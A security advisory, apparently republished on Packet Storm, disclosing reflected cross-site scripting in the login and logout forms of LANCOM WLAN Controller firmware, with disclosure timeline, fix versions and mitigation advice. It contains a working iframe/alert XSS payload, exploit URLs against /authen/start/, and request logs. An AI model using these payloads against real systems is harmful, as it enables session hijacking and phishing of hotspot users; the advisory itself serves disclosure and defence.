what you don't know can hurt you

LANCOM WLAN Controller Cross Site Scripting

LANCOM WLAN Controller Cross Site Scripting
Posted May 7, 2020
Authored by Benjamin Kunz Mejri | Site vulnerability-lab.com

LANCOM WLAN Controller suffers from multiple cross site scripting vulnerabilities. Multiple versions and firmware are affected.

tags | exploit, vulnerability, xss
MD5 | 7ece3c3a6176d1f330a0539cbe158dc6

LANCOM WLAN Controller Cross Site Scripting

Change Mirror Download
Document Title:
===============
LANCOM WLAN Controller - Multiple Cross Site Scripting Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2196

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2020/04/30/vulnerability-lancom-systems-wireless-controller-series-uncovered


Release Date:
=============
2020-05-07


Vulnerability Laboratory ID (VL-ID):
====================================
2196


Common Vulnerability Scoring System:
====================================
4.7


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Die LANCOM Public Spot Option ermöglicht die Bereitstellung eines
zuverlässigen und sicheren Zugangs für Gäste, Besucher,
Partner oder Kunden über nur eine Infrastruktur. Dabei bleiben Haus- und
Gastnetz stets sicher voneinander getrennt.
Ohne das Netzwerk um zusätzliche Hardware-Komponenten zu erweitern,
erhalten Sie mit der LANCOM Public Spot Option
die optimale Lösung für die Einrichtung sicherer Hotspots.

(Copy of the Homepage:
https://www.lancom-systems.de/produkte/software-optionen/lancom-public-spot/
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
non-persistent cross site scripting vulnerabilities in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.


Affected Product(s):
====================
LANCOM Systems
Product: WLAN Controller WLC-1000 & WLC-4006 ...
Firmware: LCOS 10.12 SU14, 10.20 SU9 & 10.32 RU8


Vulnerability Disclosure Timeline:
==================================
2020-03-20: Researcher Notification & Coordination (Security Researcher)
2020-04-14: Vendor Notification (Security Department)
2020-04-15: Vendor Response/Feedback (Security Department)
2020-04-20: Vendor Fix/Patch (Service Developer Team)
2020-05-07: Security Acknowledgements (Security Department)
2020-05-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple cross site scripting web vulnerabilities has been discovered in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise
browser to web-application requests from the client-side. The product is
publicly certified by the BSI in germany and owns a
security policy against backdoors.

The cross site scripting vulnerabilities are located in the `userid` and
`password` parameters of the `/authen/start/` (login/logout) module.
Unauthenticated attackers can connect to the guest wifi (ibd gast) with
the web ui logon mask to inject own malicious non-persistent script
codes for client-side manipulations into the login and password input
fields. The execution can as well be triggered with a simple logout GET
method request via refresh parameter. The request method to inject the
malicious script code is POST and the attack vector of the vulnerability
is non-persistent on client-side.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is POST/GET. The vulnerabilities are classic client-side
cross
site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, non-persistent phishing
attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.

Request Method(s):
[+] POST / GET

Vulnerable Module(s):
[+] /authen/start/
[+] /logout/

Function(s):
[+] refresh

Vulnerable Parameter(s):
[+] Userid
[+] Password


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers with guest
authentication and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser
2. Tamper the http session protocol
2. Start a Wifi Scan
2. Identify the public guest hotspot of lancom
3. Connect to it with guest permissions without credentials
4. Interact by openening the web ui on login.com were you can connect
with the correct wifi access credentials
5. Inject the payload in the userid and password input fields of the
wifi hotspot login form and submit via post method
6. The injected script code directly executes near to the input field
were the content is insecure transmitted
7. Successful reproduce of the cross site scripting web vulnerability!


PoC: Payload
test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>


PoC: Exploitation
http://www.login.com/authen/start/?refreshhost=192.168.20.13737&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
http://logout/authen/start/?refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>


Vulnerable Source:
<div id="contentDiv">
<h2>Login</h2>
<form method="POST" name="myForm" action="http://logout:80/authen/login/">
<div><input type="hidden" name="refreshdir" value=""></div>
<div><input type="hidden" name="refreshhost" value="192.168.20.137"></div>
<div><input type="hidden" name="refreshssl" value="0"></div>
<input style="color:#000000" id="userid" name="userid" type="text"
size="24" maxlength="64" value="a"><iframe src="[evil.source]/"></iframe>"
onfocus="if(this.value && this.value == this.defaultValue) {
this.value=''; if(document.all) {this.createTextRange().select(); }
this.style.color='#000000'; }" onblur="if(this.value == '') {
this.value='a""><iframe src="[evil.source]/"></iframe>';
this.style.color='#000000'; }"/><br>
<input id="password" name="password" type="text" size="24"
maxlength="64" value="Your password" onfocus="if(this.value &&
this.value == this.defaultValue) { this.value=''; if(document.all)
{this.createTextRange().select(); }
document.getElementById('showPassword').checked ?
this.type='text' : this.type='password'; this.style.color='#000000'; }"
onblur="if(this.value == '') { this.value='Your password';
this.type='text'; this.style.color='#ccc'; }">
<div style="padding-bottom:0px;">
<input id="showPassword" name="showPassword" type="checkbox"
onchange="if(document.getElementById('password').value &&
document.getElementById('password').value
!= document.getElementById('password').defaultValue) { this.checked ?
document.getElementById('password').type='text' :
document.getElementById('password').type='password' }"><span
id="showPasswordText">Show password</span>
</div>


--- [PoC Session Logs] --- (Login)
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: max-age=3600, must-revalidate
Content-Type: image/svg+xml
Content-Length: 9362
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Content-Security-Policy: default-src 'self' 'unsafe-inline'; script-src
'self' 'unsafe-inline' 'unsafe-eval'; connect-src *
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none';
camera 'none'; magnetometer 'none'; gyroscope 'none'; speaker 'none';
vibrate 'none'; fullscreen 'self'; payment 'none'
Content-Encoding: gzip
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: LANCOM


--- [PoC Session Logs] (POST) --- (Logout)
http://logout/authen/login/
Host: logout
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: null
Connection: keep-alive
Upgrade-Insecure-Requests: 1
refreshdir=&userid=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>&password=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
-
POST: HTTP/1.1 200 OK
Connection: Close
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none'; camera 'none';
magnetometer
'none'; gyroscope 'none'; speaker 'none'; vibrate 'none'; fullscreen
'self'; payment 'none'
Content-Encoding: gzip


Reference(s):
http://logout/
http://logout/authen/
http://logout/authen/login/
http://www.login.com/
http://www.login.com/images/
http://www.login.com/authen/
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=


Solution - Fix & Patch:
=======================
The vulnerability can be patched by following the steps ...
1. Parse the content of the username and password input field to prevent
the injection point
2. Restrict the input field by disallowing the usage of specific special
chars for the name and password variables
3. Secure the output location were the content is insecure sanitized
delivered as output result


Solution of Manufacturer:
https://www.lancom-systems.de/service-support/soforthilfe/allgemeine-sicherheitshinweise/
https://www.lancom-systems.com/service-support/instant-help/general-security-information/

The vulnerabilities are resolved in the following versions ... LCOS
10.12 SU15, 10.20 SU10 & 10.32 RU9.
We recommend all product customers to update the lcos as soon as
possible to prevent attacks by criminals.


Security Risk:
==============
The security risk of the non-persistent cross site scripting
vulnerability in the login form of the wifi hotspot application is
estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close